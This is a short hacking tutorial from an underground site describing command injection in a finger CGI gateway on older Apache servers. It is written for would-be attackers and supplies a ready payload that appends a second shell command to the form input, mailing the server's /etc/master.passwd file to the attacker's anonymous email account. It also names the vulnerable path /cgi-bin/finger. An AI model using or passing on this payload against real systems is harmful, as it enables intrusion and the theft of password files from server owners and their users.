-----[ www.TheCyberUnderground.com

Older versions of Apache Webserver have a simple cgi file that basically allows browsers to
finger users on the box via a web interface.  How it works (in a nutshell), is that whatever
you type in the field before hitting 'submit' is issued in a shell on the unix machine, with the
term 'finger' put before it.  

So if you type 'root', the cgi will issue 'finger root' in a shell, and the output will be
displayed in your browser.  Soooo....

If you type 'root ; /bin/mail youremail@hotmail.com < /etc/master.passwd' in the field, the cgi
will issue 'finger root ; /bin/mail youremail@hotmail.com < /etc/master.passwd'.  So the account
root will be fingered, THEN the second commandline (separated by a semicolon or an ampersand)
will be issued, in this case mailing the password file to your anonymous hotmail account.

The Finger Gateway is at /cgi-bin/finger on vulnerable Apache servers.
Also, even if the admin patched (or received a patched version) that escapes metacharacters,
you can still use this interface to run standard finger queries, which in itself is a security
hole.